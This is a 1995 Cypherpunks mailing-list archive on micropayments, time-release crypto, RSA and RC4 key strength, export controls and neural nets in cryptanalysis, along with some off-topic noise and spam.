A big part of what is happening with microtransaction evolution is that the buyer will be able to consider, decide, and pay, all in the space of a second. You can forget about anything based on paying in "advance," and all those draconian mechanisms -- they won't exist because they won't need to exist. Instant payment at very low prices collapses whole ranges of problems that no longer need be addressed.

> a rather extraordinary new economy can replace this,
> that of voluntary payment.

We have "voluntary payment" now in most transactions not involving the government.

> you DISDAIN things like copyright, because they prevent
> your "product" from reaching the eyes of potential
> customers. your goal is actually to distribute the
> product as far as possible, in a sort of pyramid-like
> scheme. you want your "customers" to distribute your
> product to their friends, so that those "friends"
> potentially become customers in an endless cycle.

You don't actually collect anything, though. I guess you make it up in volume, right?

> this approach works amazingly with writing. imagine that
> if John Markoff suddenly QUIT the NYT and just wrote
> articles on his own. and imagine that at the bottom, you
> see a message, "for more of the same, send .5c or more to
> markoff at liberated.com". I submit that in the future,
> Markoff will probably be able to make more money than he
> does at NYT, because he is eliminating the middleman.
the
> newspaper company is primarily built as a *distribution*
> channel. suddenly he doesn't have to pay anything out of
> his own salary, so to speak, for distribution.
> distribution is *free*. he doesn't require anyone else
> to do it for him. he puts his article in an appropriate
> place on the net and it circulates like a VIRUS if it is
> well received. the more people that see the article, the
> more people that pay him money.

You've got *part* of an idea here, but it's mixed up with another idea. It is already common for people with service or product to sell to offer "free" information in the form of articles, papers, small utilities, demos that may actually have some use, and occasionally, fully functional products. In the field of intellectual property in the electronic age, the incremental cost of a copy approaches zero, so there is no great investment in doing this. There is, however, always something larger FOR SALE, something that is being promoted by the favorable exposure. What is being given away is not the final product one hopes to sell -- it is a loss leader, something that in the field of information costs precious little to run off.

> in an information system, individual objects have no
> value. what has value is the FLOW of quality information.
> if Markoff continues to flow with that good information,
> people will continue to pay for it. they will perceive
> that "by paying him, the quality information flow from
> him to me continues or increases".

People as marketplace players do not think like that.

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.
The way some of them *may* think is, "I like this product; it will evolve; my payment for a $1 license today entitles me to new versions for a year; so this is a Smart Move." Also: "I like this digest article. I like the way this author thinks and expresses himself. It's a no-brainer to pay 20 cents for a copy of his full newsletter."

> another interesting area is that of patents, and I see
> this dissolving in the same way. a patent is like trying
> to put a lock on an idea. but gradually people will
> realize, only ideas that are implemented have any value.
> you can't profit and lock an idea at the same time.

"Lock" and "no value" are not how patent is generally viewed. Xerox, Polaroid, IBM, Dow, duPont, et al would be amused at your view.

> *dissemination* of ideas is what leads to profit, not
> locking them up.

You first. Dissemination of *something* leads to exposure, establishment of credibility, *reputation*, in a word. That, in turn, gets you in the door for actual sales, whether of yourself, your funding proposal, or your actual product or service. *That*, in turn, *may* lead to profits, assuming you have a whole bunch of other ducks in a row and manage your business well.

> hence there will be an economic incentive to an inventor
> to give away his ideas for free, at first.

Yep, yep, I'm sold, just show me where to dump all these great ideas so I can get rich, quick.

> in the old system, where one thinks of an idea as a
> "thing", this sounds preposterous.

Uh, um, in a word, "Yes."

> but in a new culture where ideas are seen as things that
> need to be cultivated and grown to work, it will seem
> eminently sensible. the inventor is releasing his idea to
> the world, saying "I can expand on this idea, even turn
> it into a reality, if you send me money".

It was late, right? You'd been up for a long time, right? You were getting the aching-back, numb-fingered madrugada sillies, right?
You mailed this in the afternoon because you'd slept it off by then and forgotten what you'd written, right?

> other people can of course steal the idea, but
> there is no value in the idea itself:

No, of course not!

> the value is in the development of it

Which only the originator can do, of course.

> into evolved new states, or the intellectual expertise of
> the inventor.

Yeah, history really shows this to be an effective principle on which to peg the survival of inventors.

> in short, microcurrency could have quite a liberating
> and revolutionary effect on economics as we know it.

Yep. Liberating it clear away from planet Earth. Revolutionary, as in, "orbital."

> in the current system, people are not paid for tiny
> contributions to the whole. the contributions have to be
> "packaged up" into something like a magazine before
> individuals can get any profit. a new system may allow
> people to be compensated directly for things that are
> hard to quantify.

This *is* part of the point, V. Physical manufacture and distribution of printed magazines have inherent floor costs and necessary economies of scale that are blown away in electronic media on the Web. Just plug in a way for quick and easy micropayment and the real revolution will be off and running.

> how much was Markoff's last article worth in the NYT?
> that's impossible to figure out. but if you had a
> microcurrency, you can calculate exactly how much money
> people sent to Markoff for his last article. say, across
> the world, it totalled $843.16. such a sum is not
> inconceivable. and over time it would be enough for him
> to make a salary over the whole year on, perhaps!! I'm
> arguing that this is increasingly going to become VIABLE
> over the next few years with cyberspace and
> microcurrency.

Yes, but not with payment after the fact on the honor system.
Sit down with *any* of the numerous vendors from whom you presently buy living space, food, municipal services, phone service, Internet access, car repairs, etc., and try convincing them that you should get the product first, and if you like it you will pay. Later. Right.

> the microcurrency situation can even be set up in a
> company. "whoever codes this computer problem will
> receive [x] dollars from the company". the whole economic
> system becomes a fluid, pulsing entity that filters down
> to the tiniest fraction of value and gives each
> individual a quantitative value on his contribution.
> companies talk about "incentive systems" today, but
> perhaps the entire economy will become an enormous
> incentive system in this way in the future!!

I believe this is called "The Free Market," and it has little to do with any concept of "pay what you think it's worth after you use it." The Internet is exploding in part because it is the *only* free market in the world, though a market in tenuous and vaporous ideas and information propagated for many reasons other than direct pecuniary benefit. A micropayment mechanism will allow the net to mature into a fully functioning free market in information and services of value on which many of the participants will support themselves. Many of those products and services do not presently exist as such. "Companies" will be quite virtual and non-geocentric, and will form and disband in the ether. Too, everyone's low-cost opinion soapbox will sprout a 1-cent sign on it, and the ones with something to say that others want to read will make something on their expression of thoughts, research, and other information while the ones no one cares to pay for will wither or preach to themselves.

> in this system, ultimately, I think the whole concept
> that someone "buys a product" will dissolve into the
> idea that "one rewards intellectual productivity to bring
> more of the same".
it's as fundamental and intuitive as
> the difference between atoms and bits.

I disagree. I believe you're right about the imminent revolution that will take off when the micropayment mechanism falls into place, and several of the underpinnings you present in support of that view, but I think you've misread what this is about and where it's going.

The crypto relevance is that everything is in place for profound new growth in a new form of commerce, awaiting only an effective mechanism that will allow one to make a fraction-of-a-second decision and click on something to at once authorize a micropayment and navigate somewhere. Web page designers will work out how to best use it and how to package the information it buys. Storable pre-authorization tokens would be nice, so that one can make a decision that persists through subsequent accesses and only pops up for review if the price changes. And it's got to be smooth enough for Grandma to use it.

------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block. What do you bid? |
---------------------------------------------------------
          Unofficial Wang VS Information Center

From stewarts at ix.netcom.com Sat Nov 11 01:07:18 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 95 01:07:18 PST
Subject: Who needs time vaults anyway?
Message-ID: <199511110908.BAA16272@ix12.ix.netcom.com>

At 12:15 AM 11/11/95 -0700, bryce at colorado.edu wrote:
>I don't really understand the use for "can't be opened until
>Christmas" tricks. If you don't want anyone to see your info until
>Christmas then just don't give them a copy until then! If you want
>to prove that you have it but not let them see it until later then
>do timestamping of hashes, zero-knowledge proofs and so forth.

For instance, suppose you want to give someone digicash on a certain day (like a bond from your bank...) Or leave a will, which nobody can hassle you about while you're alive.
Or (as an extension of both) a trust that can't be spent until some time certain in the future, like when you want to pay Alcor to thaw your carcass out.

For the more realistic case, bonds, you want to be able to give them the bond so they've got it in their hot little hands, but can't cheat by spending it. In a normal business relationship, where all the parties have names of some sort, this isn't so tough; it gets harder when some or all of you are pseudonyms...

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From stewarts at ix.netcom.com Sat Nov 11 01:07:22 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 95 01:07:22 PST
Subject: Lotus Notes RSA Implementation Question
Message-ID: <199511110908.BAA16275@ix12.ix.netcom.com>

At 06:13 AM 11/11/95 GMT, bglassle at kaiwan.com wrote:
>>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
>>encryption in the exportable version and bigger keys for signatures in all
>>versions and for encryption in the USA version.
>
>I would assume since they are using a key size >40 bit, it is used for
>authentication only, not for data encryption, that would skirt the ITAR
>regs. In fact according to the docs, there is no data encryption when
>connecting to an international version server, regardless of the
>client version.

RSA keys get to have more bits than symmetric-key encryption, because they're easier to crack and you typically use them for different things. The permitted length seems to usually be 512 bits for RSA and 40 bits for decent-quality symmetric cyphers (as opposed to easy-to-crack proprietary cyphers, which may be longer if they're wimpy and the NSA's in a good mood.) Your mileage may vary, of course.

>My understanding was that the problems exposed with RC4 that you
>mentioned, were with the particular implementation by Netscape.

There were two different problems found. The first was a straightforward brute-force crack on 40-bit RC4 (RC4 lets you choose key length...) While it did have known plaintext near the beginning of the message, having it _anywhere_ makes it crackable, with a bit more work. The second problem was a Netscape-specific use of low-quality random numbers to pick the RC4 keys. But the first crack was the real thing.

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From andreas at artcom.de Fri Nov 10 09:45:44 1995
From: andreas at artcom.de (Andreas Bogk)
Date: Sat, 11 Nov 1995 01:45:44 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID:

>>>>> "Raph" == Raph Levien writes:

    Raph> Since RSA decryption is cubic in key size, it takes about
    Raph> twenty times as long to sign or decrypt a message. Since

Actually Sedgewick shows an algorithm that runs in O(N*N*log N).

Andreas

From anonymous at robo.remailer Sat Nov 11 02:00:08 1995
From: anonymous at robo.remailer (anonymous at robo.remailer)
Date: Sat, 11 Nov 95 02:00:08 PST
Subject: RadioMail and chaining remailers
Message-ID: <199511110954.BAA25548@infinity.c2.org>

Hello All,

I am planning to purchase a HP200LX with a wireless modem with the RadioMail system, My question is.
Does the RadioMail software allow chaining of messages for remailers? Are there other crypto applications for the HP200LX's

Thanks in advance!

Liam

From tony266 at vabeach.email.net Fri Nov 10 10:03:53 1995
From: tony266 at vabeach.email.net (tony266 at vabeach.email.net)
Date: Sat, 11 Nov 1995 02:03:53 +0800
Subject: Yvette
Message-ID: <9511101244.S12252920@vabeach.email.net>

I'm wondering if Yvette from Smithfield, Va is as fine as most people say she is...

From don at cs.byu.edu Sat Nov 11 02:31:17 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sat, 11 Nov 95 02:31:17 PST
Subject: Noise and the Zen of making it go away
Message-ID: <199511111029.DAA00758@wero.byu.edu>

From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Win95 A Hacker's Net Dream

Windows 95 Is A Hacker's Dream Over The Internet
>Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
>with the Internet, could be a dream made in hacker
>heaven. From seasoned propeller heads Newsbytes has
>contacted, it looks like Windows 95 could be more of
>a security nightmare than was first thought.
[snip]

From: an407769 at anon.penet.fi (jerry the golden retriever)
Reply-To: an407769 at anon.penet.fi
Date: Sat, 11 Nov 1995 06:29:46 UTC

>Windows 95 Is A Hacker's Dream Over The Internet
>CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
>Internet, could be a dream made in hacker heaven. From seasoned propeller
>heads Newsbytes has contacted, it looks like Windows 95 could be more of a
>security nightmare than was first thought.

Gee, somebody not been reading the list lately? I think it's true, the list has become the fast lane to dump junk into.

Re the idea of making cpunks subscriber only- that would solve a few problems, and people could post anonymously if a separate address were rigged up ("security through obscurity") as a subscribed address that throws away anything from cpunks and forwards everything else to cpunks.
The idea being, of course, that if you're not close enough to the action to know what the current anon-routing address is, you should go away.

At least the bulk of the conspiracypunk stuff has gone away.

Don

From David.Y at freedomnet.com Fri Nov 10 11:00:15 1995
From: David.Y at freedomnet.com (David Y)
Date: Sat, 11 Nov 1995 03:00:15 +0800
Subject: mailing list.
Message-ID: <8160284964304@.freedomnet.com>

Please put me on your mailing list, thanks.

From wilcoxb at nagina.cs.colorado.edu Fri Nov 10 11:46:09 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Sat, 11 Nov 1995 03:46:09 +0800
Subject: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <199511101816.LAA02444@nagina.cs.colorado.edu>

tony266 at vabeach.email.net allegedly wrote:
>
> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...

Let's play "Find the Topicality"! Pseudonymity and reputation generation and propagation? Text stego? No.. Hm.. Wait! I've got it! Smithfield, Va is in the same state as certain spook headquarters...

Bryce

From tony266 at vabeach.email.net Fri Nov 10 11:55:39 1995
From: tony266 at vabeach.email.net (tony266 at vabeach.email.net)
Date: Sat, 11 Nov 1995 03:55:39 +0800
Subject: This is for YOU...
Message-ID: <9511101324.S12358809@vabeach.email.net>

Yvette...
Didn't LL Cool J make a song about you..."Dear yvette"... From Atp3000 at aol.com Fri Nov 10 12:07:48 1995 From: Atp3000 at aol.com (Atp3000 at aol.com) Date: Sat, 11 Nov 1995 04:07:48 +0800 Subject: coding and nnet's Message-ID: <951110141713_18585763@mail04.mail.aol.com> cypherpunks! I just resently got interested in coding and cryptography, and I was wondering if you could suggest 3 or 4 papers that adresses the aplication of neural networks in cryptography. Thank's I really appreciate your time and consideration! Atp3000 From turner at TeleCheck.com Fri Nov 10 12:16:00 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Sat, 11 Nov 1995 04:16:00 +0800 Subject: Yvette In-Reply-To: <9511101244.S12252920@vabeach.email.net> Message-ID: <9511101938.AA17624@mercury.telecheck.com> > I'm wondering if Yvette from Smithfield, Va is as fine as most people say she > is... The chair is against the wall and the deer eats her beef jerkey savegely. Greeting Camrade, I am glad to have finally been activated. My first order is to kill the person(s) who activated me. Sorry tony, but you must die. From perry at piermont.com Fri Nov 10 12:19:13 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 11 Nov 1995 04:19:13 +0800 Subject: coding and nnet's In-Reply-To: <951110141713_18585763@mail04.mail.aol.com> Message-ID: <199511101936.OAA21643@jekyll.piermont.com> Atp3000 at aol.com writes: > cypherpunks! > I just resently got interested in coding and cryptography, and I was > wondering if you could suggest 3 or 4 papers that adresses the aplication of > neural networks in cryptography. > Thank's I really appreciate your time and consideration! I personally know of none. I'm not sure how one would apply neural networks to cryptography, frankly, or even what use one might imagine making of them. 
.pm

From KDAGUIO at aba.com Fri Nov 10 12:34:58 1995
From: KDAGUIO at aba.com (Kawika Daguio)
Date: Sat, 11 Nov 1995 04:34:58 +0800
Subject: SPAM:E-CA$H Conference SF 11/16-17
Message-ID:

COMMERCIAL - SPAM ALERT -

I will be speaking at a conference on Electronic Money that might interest some of you sitting on some extra rEeal Money who also suffer from the burning desire to find out what ideas and technology other folks are flogging on the talk-circuit. The brochure is too long to type in but some excerpts follow:

10 key questions to be answered at this critical industry event:

10. What are the biggest avenues to entry into the world of electronic commerce?
9. Who will be the biggest users of electronic money?
8. Who should be allowed to issue E-cash?
7. How will debit and checking fit in with the electronic money future?
6. How do you balance privacy, security, and efficiency in E-cash systems?
5. How can electronic commerce be used for a business advantage?
4. How will the government regulate E-cash?
3. How will electronic payment systems protect against fraud?
2. What infrastructure is needed to provide security on open networks?
1. What are the leading technologies that will be used for E-cash?

Speakers:
Ernest Brickell Bankers Trust Electronic Commerce Richard K. Crone Center for Electronic Banking, KPMG Peat Marwick ME John Doggett Bank of Boston Peter Gemmel Sandia National Laboratories Gail Grant Open Market Edward Hogan MasterCard International Randy Kahn First Interstate of California Michael Killen Killen and Associates Steve Kimmey Tandem Computers Paul Lambert Barnett Banks Ron Laurie McCutchen, Doyle, Brown and Enersen Scott Loftesness First Data Corporation Greg McKenzie Canadian Imperial Bank of Commerce B.
Clifford Neuman University of Southern California Deborah Owen Arent Fox Kinter Plotkin and Kahn Daniel Schutzer Citibank Financial Services Technology Consortium Bill Washburn Mecklermedia Magdalena Yesil CyberCash

Sponsor: IBC USA Conferences
Date: November 16 - 17
Venue: Pan Pacific Hotel 500 Post Street San Francisco
EMAIL: questions or registrations skeyles at ibcusa.com
Phone: 508.481.6400 ext 282 (Sherry)

From stewarts at ix.netcom.com Fri Nov 10 12:35:02 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 1995 04:35:02 +0800
Subject: coding and nnet's
Message-ID: <199511101952.LAA24819@ix13.ix.netcom.com>

At 02:17 PM 11/10/95 -0500, Atp3000 at aol.com wrote:
>I just recently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that addresses the application of
>neural networks in cryptography.

Schneier's 2nd edition says "Neural nets aren't terribly useful for cryptography, primarily because of the shape of the solution space. Neural nets work best for problems that have a continuity of solutions, some better than others. This allows a neural net to learn, proposing better and better solutions as it does. Breaking an algorithm provides for very little in the way of learning opportunities: You either recover the key or you don't. (At least this is true if the algorithm is any good.) Neural nets work well in structured environments when there is something to learn, but not in the high-entropy, seemingly random world of cryptography." And he doesn't give any references.

That's been my opinion of the issue as well; I looked into it a bit when I was doing a project with the neural net folks back at Bell Labs, partly because neural net chips typically have lots and lots of parallel bit-sized horsepower.
Unfortunately, the horsepower isn't arranged in ways that are very useful for crypto; adding together a large bunch of short chunks of data (maybe using floating point addition) and thresholding the sum isn't the right thing to do with highly discontinuous functions. You could take a similar chip design and connect the pieces together differently to make a brute-force searcher, i.e. take a gate array and wire it to do crypto-like calculations, but the neural net stuff doesn't do that very efficiently.

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From an237621 at anon.penet.fi Fri Nov 10 12:59:04 1995
From: an237621 at anon.penet.fi (an237621 at anon.penet.fi)
Date: Sat, 11 Nov 1995 04:59:04 +0800
Subject: Yvette
In-Reply-To: <199511101816.LAA02444@nagina.cs.colorado.edu>
Message-ID: <199511101201.MAA00215@gears.efn.org>

:
: tony266 at vabeach.email.net allegedly wrote:
:
: I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
: is...
:

Yes, there is a cow on the lawn.

From eli at GS160.SP.CS.CMU.EDU Fri Nov 10 13:30:33 1995
From: eli at GS160.SP.CS.CMU.EDU (eli at GS160.SP.CS.CMU.EDU)
Date: Sat, 11 Nov 1995 05:30:33 +0800
Subject: Lotus Notes RSA Implementation Question
In-Reply-To: <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq@andrew.cmu.edu>
Message-ID: <9511102101.AA27849@toad.com>

In article <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq at andrew.cmu.edu> Charlie Kaufman writes:
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both
>the USA and exportable versions.

512-bit RSA is exportable? I'm surprised.

It would be interesting to CJR a known-secure binary for 512-bit RSA, attempting a little differential cryptanalysis on the NSA's practices. A fair test would require that you have the political clout of Lotus/IBM, though.
--
Eli Brandt
eli+ at cs.cmu.edu

From stewarts at ix.netcom.com Fri Nov 10 13:50:02 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 1995 05:50:02 +0800
Subject: Photuris Primality verification needed
Message-ID: <199511090913.BAA08368@ix.ix.netcom.com>

At 07:47 PM 11/8/95 -0800, you wrote:
>>Including the provision for the 512 bit prime is *HARMFUL* and
>>*DANGEROUS*. Export control is not really an issue here, because if
>>companies in the United States cannot provide secure networking,
>>there are other companies in the world that can.
>
>You've convinced me. I remove my proposal to include a recommended 512-bit
>modulus. The smallest standard modulus will remain 1024-bits.

If speed is really a concern, you could do a 640 or 768 bit modulus ("Hey, back when we wrote that, everybody assumed 640 would be enough for everybody!"), or alternatively, let people use 512-bit private modulus values - they're still short, but they're not a target if everybody's got their own (which also means that popular applications shouldn't ship with a built-in 512-bit prime; if Windows 97 did that, it'd be about the same as putting it in the spec, so really short primes should probably require user-generation, which may contradict the desire to use short numbers to save time.)

One question is how to conveniently let the standard offer negotiation for the modulus length and value without adding a lot of handshake steps

-> WILL MODLENGTH 512PRIV 768 1024 1024ALT 2048
<- DO MODLENGTH 512PRIV
-> WILL MODULUS 8758432798573409875098347509834750983745098348584395984357908347509843750984
   3750983
<- 404 HEY, THAT'S NOT A STRONG PRIME!
#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From sjb at universe.digex.net Fri Nov 10 14:16:21 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Sat, 11 Nov 1995 06:16:21 +0800
Subject: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511102145.QAA06533@universe.digex.net>

Hal writes:
>This all has to happen whenever you click on a link in your browser.
>Even with fast CPU's I think the extra step of connecting to the bank,
>having it check against all coins, and getting approval will be
>considerable for each link traversal.

A system like Stephen Brands' should significantly improve the situation. There's no benefit in double-spending micropayments since you'll be identified after the fact. For small enough payments, you can skip the on-line validation and handle them in batch-mode later. It becomes a matter of risk management, then.

From nobody at REPLAY.COM Fri Nov 10 14:46:33 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 11 Nov 1995 06:46:33 +0800
Subject: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511091637.RAA06491@utopia.hacktic.nl>

At 1:14 AM 11/9/95, Bill Stewart wrote:

| The fact that Netscape is including
| secure email in their Navigator next release can be a big lever pushing the
| Feds toward giving up, and perhaps deserves some publicity once the
| release version is out the door.

Giving up on what? On doing everything within its power to keep the world beyond itself strong-crypto-free? Not likely.

In only a few decades, crypto's gone from being unheard of to the object of an increasingly high-profile PR war over "domestic and international terrorists and criminals." The govt's position, however, hasn't changed substantially: it doesn't like crypto, and it never will.
There will never be a time when the cops who pull you over or drop by for a visit will say, "Ma'am, if you've encrypted that, we respect the fact that you don't want anyone to see that--so we'll just be going now. You have a nice day, now, y'hear." And there will never be no cops.

The gov't may well lose this fight eventually, but a few heads are gonna get broken before either side wins. This fight is playing itself out on the level of policy now, but it's much bigger than a policy issue. And the "revolution" of Newt and his legions of weenies (I say nothing of Clinton and his legions of weenies) is bullshit: he's an empty opportunist who's riding a fractious coalition that'll make Clinton look like a libertarian if it ever gets control of the country. And right now he's cluing in to the fact that he can score some points on encryption issues: he's got his eye on the snowballing WiReD coalition, which *no one* knew existed until a few years ago.

From gnu at toad.com Fri Nov 10 14:50:37 1995
From: gnu at toad.com (John Gilmore)
Date: Sat, 11 Nov 1995 06:50:37 +0800
Subject: Online ITAR and AECA; Bibliography of export control books
Message-ID: <9511102207.AA29317@toad.com>

> > Where can one get a copy of ITAR ? Secondly , has anyone written any
> > books on the subject and if so who and what?

The ITAR is a regulation, not a law. You can find it via my crypto export control page at http://www.cygnus.com/~gnu/export.html under "State Department export guidance". Or at ftp://ftp.cygnus.com/pub/export/itar.in.full. It's 380 kbytes (but ignorance of it is no excuse!).

That regulation is authorized by the Arms Export Control Act (AECA), a law (22 USC Sec. 2778). The law is also available in the same places. It's only 40 Kbytes.

I own and can recommend several books on export controls.

Layman's books on general export controls and technology policy issues:

90-26801: Finding common ground : U.S. export controls in a changed
global environment / Washington, D.C.
: National Academy Press, 1991. xviii, 390 p. : ill. ; 24 cm.
LC CALL NUMBER: HF1414.5 .F56 1991

87-34877: Technology transfer : a policy model / Philip A. Roberts.
Washington, DC : National Defense University Press, 1988. xiii, 86 p. ; 21 cm.
LC CALL NUMBER: HC110.T4 R62 1988
SERIES TITLE: A National security essay
DEWEY DEC: 338.973/06 dc19

93-50697: Silencing science : national security controls and scientific
communication / Harold C. Relyea. Norwood, NJ : Ablex Pub., c1994.
xvii, 248 p. ; 23 cm.
LC CALL NUMBER: Q223 .R45 1994.
SERIES TITLE: Information management, policy, and services.
DEWEY DEC: 338.97306 dc20.
ISBN: 156750096X; 1567500978 (pbk.)

Lawyer's Tome on export controls, with detailed case citations and such:

91-37498: Root, William A. United States export controls / 3rd ed.
Englewood Cliffs, NJ : Prentice Hall Law & Business, c1991-
1 v. (loose-leaf) : ill. ; 26 cm.
ISBN: 0139529381
LC CALL NUMBER: KF1987 .L54 1990.
DEWEY DEC: 353.0082/76 dc20
[This one is loose-leaf and gets annual updates at $80/year. I forget how much it cost originally.]

By the way, if you're trying to find general references on export controls or crypto, or anything else, I recommend `telnet://locis.loc.gov' and searching the Library of Congress card catalog or the copyright records. The user interface is IBM mainframe oriented, but the information is without peer.

John Gilmore

From frantz at netcom.com Fri Nov 10 15:30:29 1995
From: frantz at netcom.com (Bill Frantz)
Date: Sat, 11 Nov 1995 07:30:29 +0800
Subject: coding and nnet's
Message-ID: <199511102255.OAA10734@netcom16.netcom.com>

At 14:17 11/10/95 -0500, Atp3000 at aol.com wrote:
>I just recently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that address the application of
>neural networks in cryptography.

Perhaps neural nets could be used in an unknown plain text, brute force attack to automatically select possible decryptions for human examination.
I don't know of any papers on the subject.

Bill

-----------------------------------------------------------------
Bill Frantz          Periwinkle -- Computer Consulting
(408)356-8506        16345 Englewood Ave.
frantz at netcom.com  Los Gatos, CA 95032, USA

From jya at pipeline.com Fri Nov 10 15:54:53 1995
From: jya at pipeline.com (John Young)
Date: Sat, 11 Nov 1995 07:54:53 +0800
Subject: coding and nnet's
Message-ID: <199511102323.SAA06186@pipe2.nyc.pipeline.com>

Bruce Schneier comments:

Neural Networks

Neural nets aren't terribly useful for cryptanalysis, primarily because of the shape of the solution space. Neural nets work best with problems that have a continuity of solutions, some better than others. This allows a neural net to learn, proposing better and better solutions as it does. Breaking an algorithm provides for very little in the way of learning opportunities: You either recover the key or you don't. (At least this is true if the algorithm is any good.) Neural nets work well in structured environments where there is something to learn, but not in the high-entropy, seemingly random world of cryptography.

"Applied Cryptography," second edition, 1996, p. 155.

From anonymous-remailer at shell.portal.com Fri Nov 10 16:18:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 11 Nov 1995 08:18:19 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511102353.PAA15671@jobe.shell.portal.com>

On Fri, 10 Nov 1995, Peter D. Junger wrote:

> In any case, I want to thank him for doing so, because it brought home
> to me the important fact that it is possible that the ITAR provisions
> relating to cryptographic software could be struck down, not because
> they violate the first amendment, or would violate it if passed by
> congress, and not because the court is trying to dodge the difficult
> first amendment issue, but simply because the provisions are not
> authorized by any legislation.
Hmmm, Peter actually has me worried. I actually _understood_ what he was talking about. And that has me worried.

I guess that reviewing all that LIBOR financing documentation over ten years ago, when I was extending a helping hand to the CIBC helped. No one should ever attempt to figure out what happens when you have an American highrise owned by a private Canadian citizen, go into receivership with a syndicated Euro-financing while attempting a head lease to AT&T. An experience like that leaves you scarred for life. You actually learn to grok "lawyer speak".

I guess that an interesting follow up occurs, if I perhaps muddy the crystal clear waters of Peter's analysis. It relates to another thread on this list, the thread on time-release crypto and the economics of information. A hypothetical which might clarify by making things murky.

If I ... as a foreign citizen ... a Canadian ... were to release an algorithm for time-release crypto to another Canadian ... another foreigner, could I actually be hauled down by the scruff of my neck to face US style "justice". Could I be deprived of our Canadian traditions of Napoleonic Code and of British Common Law, to face Americanisms.

Does anyone from State have any clarification of this policy-shift??

I find it ridiculous to hear that if I load a series of messages into a fax machine, and instruct that machine to send out a series of documents at some set point in time -- and that if I were to *communicate* this method of time delay cryptographically secure communication to another Canadian citizen, that I could actually be hauled out of my own country and dragged across an international border to face charges of treason against a state to which I have no allegiance.

This would be laughable, if it weren't so sinister. I mean, it's only a FAX machine ... for goodness sake's.

Here I am as a Canadian citizen, a citizen of a sovereign State, a state which has historically been a friend of the American people.
A State which has actually sacrificed its own international stature and the security of its citizens, to benefit Americans. (Most notably, when Canada rescued the hostages in Iran) and America repays the citizens of Ambassador Ken Taylor's home town how?? With an implied threat of making them subject to US law because it's administratively convenient?

Indeed. Can't anyone find acts of treason, a little closer to home?? Domestically maybe ... possibly even right under your nose ...

> It's too far off topic to pursue any further, but I must take
> exception to the suggestion that we are well served by separation of
> powers intruding into other legal domains. Bowsher tells us that
> causation principles go out the window in SOP cases. That alone
> makes it radioactive.

You ain't whistling Dixie.

> I must admit that I don't know what it is that he is referring to.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From s1113645 at tesla.cc.uottawa.ca Fri Nov 10 16:44:23 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 11 Nov 1995 08:44:23 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To:
Message-ID:

On Mon, 6 Nov 1995, Timothy C. May wrote:

> A good way for newcomers to find out what's been written on some topic that
> interests them, or to see who's writing what. (I checked out the index for:

Lycos includes the entire cpunks archive at hks.net (not just the address, the whole damn archive can be keyword searched), also another nice method. Did me wonders for a term paper. Will have to do until keyword searches are added to the archive itself.

(wildcard searches also work at dejanews, which gives me 68 hits for tcmay@* , including your sensemedia address.
Somehow I don't think any of the klaus@* addresses are yours)

From trei at process.com Fri Nov 10 16:44:38 1995
From: trei at process.com (Peter Trei)
Date: Sat, 11 Nov 1995 08:44:38 +0800
Subject: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <9511062238.AA04563@toad.com>

> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> http://dejanews.com/
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

Unfortunately, it does not archive alt, soc, talk, or *.binaries (the latter is probably a blessing). Specialized news grepping is still useful - see http://www.iii.net/users/trei/usenet.html for an example.

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

